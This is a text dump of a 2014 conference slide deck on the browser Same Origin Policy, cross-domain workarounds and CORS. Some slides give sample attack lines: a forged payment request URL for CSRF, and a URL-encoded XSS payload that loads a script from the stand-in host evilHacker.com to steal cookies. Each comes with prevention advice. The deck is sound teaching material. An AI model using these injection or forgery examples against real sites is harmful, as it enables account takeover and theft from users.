Post on 27-Aug-2014
description
var title = “Go Beyond Cross Domain Boundaries”;$(this).attr(“title”, title);
$(this).data({
font: ‘Segoe UI’,
size: ‘30pt’,
speaker: ‘Ivelin Andreev’
});
About me
• Project Manager @
• 11 years professional experience
• MCPD .NET Web Development
• ivelin.andreev@icb.bg
• http://www.linkedin.com/in/ivelin
• Business Interests
o Web Development (ASP.NET, jQuery, AJAX)
o SOA, Integration
o GIS, Mapping
o Performance tuning, Network security
Agenda
• What is Same Origin Policy
• Security issues it solves
• Security issues it does not solve
• X-domain techniques
• CORS
• Why CORS?
• Demo
The Same Origin Policy (SOP)
• Same origin - if scheme://host:port are the same
• JavaScript limited by SOP
• Script access properties of documents with same origino DOM objects
o Cookies
Same origin policy is the most important security
concept in modern browsers
https://lh4.googleusercontent.com/-o9vXTXNxnYc/TY3u5UpV-UI/AAAAAAAAXiM/gvMHSRbhGWU/s1600/1600constitution.jpg
Same Origin Policy as Concept
• Not a single policy but set of mechanismso SOP for DOM access
o SOP for XMLHttpRequest
o SOP for Cookies
o SOP for Flash
o SOP for Java
o SOP for Silverlight
• Significant bottleneck in browsers
• Behavior is different among browsers
• Static bound to single domaino Not all content on site should be trusted the same
Change origin is possible (with some limitations)
http://nutshelltek.com/wp-content/uploads/2013/05/Security.jpg
Changing Origin
• document.domaino Allow subdomain to access parent domain
o Must set to the same value for parent domain and subdomain
• Port number set to null
• Even in document.domain = document.domain
• Cross-origin network accesso X-Origin Writes – Typically Allowed (redirects, form submissions)
o X-Origin Embed – Typically Allowed
• JavaScript <script src="..."></script>
• CSS <link rel="stylesheet" href="...">
• Frames <frame>, <iframe>
• Media & Plugins <img>, <video>, <audio>, <object>, <embed>
o X-Origin Reads – Typically Not allowed
Same-Origin Policy Limits
• http://evilHacker.como <a>
• Can link to resource in another domain
• But cannot control site from another domain
o <iframe>
• Include resource from another domain
• But cannot directly access DOM
o <script>
• Include script from another domain
• But cannot act on behalf of the script
• Implement policy check and inspect contents of enclosing page
o <form method=“POST” name=“f1” action=“http://company.com/page.aspx”>
• Submit forms without user input
• But cannot access user cookies
Cross domain policy does NOT prevent web
application exploits
• Impacto EvilHacker.com cannot read DOM but can POST to app
o User access is blocked or stolen
o Act on behalf of the user (payment)
• Preventiono Identify valid requests
• By user provided secret (low usability)
• By XSRF token for every request
Cross Site Request Forgery (XSRF)
• Caseo User logs in http://goodSite.com as usual
o http://evilHacker.com can
• POST new password in form to GoodSite.com
• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker
o Authenticated because cookies are sent
Cross Site Scripting Inclusion (XSSI)
• Caseo http://goodSite.com includes <script> to perform AJAX request
o http://evilHacker.com includes the same script
o Authenticated because cookies are sent
o JSONP (SCRIPT + JSON) returned by server as usual
o SCRIPT evaluated in EvilHacker.com context and JSON is stolen
o EvilHacker.com redefines callback
• Impacto User data are stolen
• Preventiono http://goodSite.com must check policy of script inclusion
Cross Site Scripting (XSS)
• Caseo http://evilHacker.com injects <script> in http://goodSite.com application context
• By posting HTML form field
• By tricking user to click link with query parameters sent by mail
o %3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E
• Impacto Steel user cookies for GoodSite.com and transfer to EvilHacker.com
o Phishing attack redirects to GoodSite.com copy
o Script modify GoodSite.com content (even SSL cert will not warn)
• Preventiono Filter user input
o ALWAYS HTML and URL Encode/Decode
o Do not send untrusted data to browser
There is need of reliable and secure
Cross Domain Messaging
http://leadership-standard.blogspot.com/2012/08/the-message-you-dont-need.html
Common X-Domain Use Cases
Typical cases
• Consume REST APIs
• Build mashups
• Operate Ads
• Synchronize two pages
Use when
• You own both sites
• Request information from a site that trusts you
Note
• No solution solves the problems in every browser.
Policy limitations forced developers create
ingenious workarounds
window.name Hack
• Child window (frame/iframe) sets:
window.name = ‘{“message”:”text”}’;
• Parent window:
f = document.createElement('iframe');
f.onload = function () { doWork(); f.src='about:blank'};
f.src = 'http://otherDomain.com';
document.body.appendChild(f);
Notes:
• Very tricky, works on all browsers
document.domain Hack
• Allows cross SUB-domain access//From a page in http://sub.masterDomain.com
document.domain = “masterDomain.com”;
• Pages can access each other’s DOM objects
• The sub- and parent domain have the same permissions
Notes:
• document.domain is ReadOnly property in HTML spec.
• Useful when you do not own both sites
• Works on all browsers
• Port set to null when document.domain is set
iFrame Proxy Hack
• domainB tries to get parent.documento Permission denied to access property ‘document’’
• Hidden iFrame to exchange data
• Proxy: subscribes to onResize event
• Child: domainB sets hash on proxy domainA.com#msg
• Proxy: reads message and changes window.top
Notes:
• Do-it-yourself approach
• Complex and browser-dependent
• Widely accepted as standard
http://designtaxi.com/userfiles/articles/101845/thumb/banner.png
Other solutions are not that hacky
What is new in HTML5
window.postMessage
Pass message between two windows safely
otherWindow.postMessage(message, targetOrigin, [FF:transfer]);
• otherWindow can listen for sent messages by executing:
function receiveMessage(event) {
if (event.origin !== "http://example.org") return; ... }
window.addEventListener("message", receiveMessage, false);
Notes:
• Basic support in IE8, IE9, limitations in IE10
• Always check origin to prevent XSS attacks
• If you do not expect messages, do not subscribe
JSON-P
• Loads JSON from another domain
• Exploits HTML <script> element exception to SOP
• Client adds query parameters to server<script type="application/javascript" src="http://otherDomain.com/Svc/Get?callback=parseResponse" />
• Server returns JSON wrapped in function callparseResponse ({“this”:”is”,”json”:”data”});
• JS function callback evaluated in page
Notes:
• Useful for RESTful APIs
• Vulnerable to XSRF and XSS attacks
easyXDM Library
• Pass string messages between domainso Enables developers to workaround SOP limitations
o postMessage transport on modern browsers, fallback to frame element
• Consumer
var socket = new easyXDM.Socket({
remote: “http://domain.com/provider/”, //provider path
onMessage: function(message, origin){
if (origin==“…”) alert(message); } });
socket.postMessage(“message");
• Provider
var socket = new easyXDM.Socket({
onMessage: function(message, origin) {alert(message); } });
Cross Origin Resource Sharing
http://onlypositive.net/image.axd?picture=2010%2F6%2Fsharing-ice-cream-cone-girl-dog.jpg
How does CORS Work
• Request headerso Origin: http://myDomain.com
• Response headerso Access-Control-Allow-Origin:
• http://myDomain.com
• “*” – all domains allowed
o Error if not allowed
Note: “*” does not allow supply of credentialso HTTP authentication will not work
o Client SSL certificates will not work
o Cookies will not work
Preflight Request
• Required wheno HTTP verb other than GET/POST
o Request MIME type other than text/plain (i.e. application/json)
o Custom headers
• Headers determine whether CORS is enabledo Request (HTTP OPTIONS method)
• Origin: http://myDomain.com
• Access-Control-Request-Method: [method the request wants to use]
• Access-Control-Request-Headers: [optional CSV, custom headers]
o Response
• Access-Control-Allow-Origin: [allowed origin]
• Access-Control-Allow-Methods: [CSV allowed methods]
• Access-Control-Allow-Headers: [CSV allowed headers]
• Access-Control-Max-Age: [seconds preflight is valid]
Credential Request
• By Defaulto X-domain do not send credentials (cookies, client SSL, HTTP authentication)
• Request (specify send credentials)o xmlHttpRequest.withCredentials = true;
• Response headers (if server allows )o Access-Control-Allow-Credentials: true
o Access-Control-Allow-Origin: http://myDomain.com
o Otherwise response will be ignored by browser
o Header can be sent during pre-flight request
Can I Use
http://caniuse.com/cors
IE 8 and IE9 limitations• Use XDomainRequest
• Preflight not supported
• Request limited to the target scheme of hosting page
Why use CORS
• The most robust solution for X-domain requests with JS
• The best approach to consume RESTful API with JS
• Modern alternative to JSON-P and W3C standard
JSON-P CORS
HTTP Verbs GET GET,PUT,POST,DELETE,OPTIONS
Browser Support All Does not < IE 8
Error Handling Tricky to none HTTP status access via XHR
Performance 1 HTTP Request 2 Requests (up to 3)
Authentication Cookies only Cookies, Basic, client SSL
X-Site Scripting If external site compromised Consumer parses response
Check this out
• Open Web Application Security Projecto https://www.owasp.org/
• Mozilla Developer Networko http://developer.mozilla.org
• Html5rocks CORS Tutorialo http://www.html5rocks.com/en/tutorials/cors/
• Gruyere Code Lab - Exploits and Defenseso http://google-gruyere.appspot.com/
Demo
DEMO
Thanks to our Sponsors:
Diamond Sponsor:
Gold Sponsors:
Swag Sponsors: Media Partners:
Technological Partners:
Silver Sponsors:
Bronze Partners: